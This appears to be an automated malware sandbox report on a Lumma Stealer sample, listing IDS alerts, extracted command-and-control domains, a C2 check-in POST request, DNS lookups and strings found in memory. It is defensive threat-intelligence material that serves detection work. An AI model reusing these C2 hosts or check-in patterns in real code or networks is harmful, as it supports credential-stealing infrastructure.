    Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.9:49776 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.9:57919 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.9:64895 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.9:61039 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2057415 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com) : 192.168.2.9:63122 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.9:49780 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.9:49306 -> 1.1.1.1:53
    Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49776 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49776 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.9:49765 -> 104.102.49.254:443
    Source: Malware configuration extractorURLs: drawwyobstacw.sbs
    Source: Malware configuration extractorURLs: resinedyw.sbs
    Source: Malware configuration extractorURLs: mathcucom.sbs
    Source: Malware configuration extractorURLs: vennurviot.sbs
    Source: Malware configuration extractorURLs: allocatinow.sbs
    Source: Malware configuration extractorURLs: droppyrelivei.cfd
    Source: Malware configuration extractorURLs: condifendteu.sbs
    Source: Malware configuration extractorURLs: ehticsprocw.sbs
    Source: Malware configuration extractorURLs: enlargkiw.sbs
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
    Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
    Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49776 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49780 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49765 -> 104.102.49.254:443
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marshal-zhukov.com
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: droppyrelivei.cfd
    Source: global trafficDNS traffic detected: DNS query: mathcucom.sbs
    Source: global trafficDNS traffic detected: DNS query: allocatinow.sbs
    Source: global trafficDNS traffic detected: DNS query: enlargkiw.sbs
    Source: global trafficDNS traffic detected: DNS query: resinedyw.sbs
    Source: global trafficDNS traffic detected: DNS query: vennurviot.sbs
    Source: global trafficDNS traffic detected: DNS query: ehticsprocw.sbs
    Source: global trafficDNS traffic detected: DNS query: condifendteu.sbs
    Source: global trafficDNS traffic detected: DNS query: drawwyobstacw.sbs
    Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
    Source: global trafficDNS traffic detected: DNS query: marshal-zhukov.com
    Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: marshal-zhukov.com
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2Assured
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredI
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.0.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digi
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
    Source: ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digice
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
    Source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006DA000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498477157.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499874700.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1500855304.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499006621.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1499609486.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
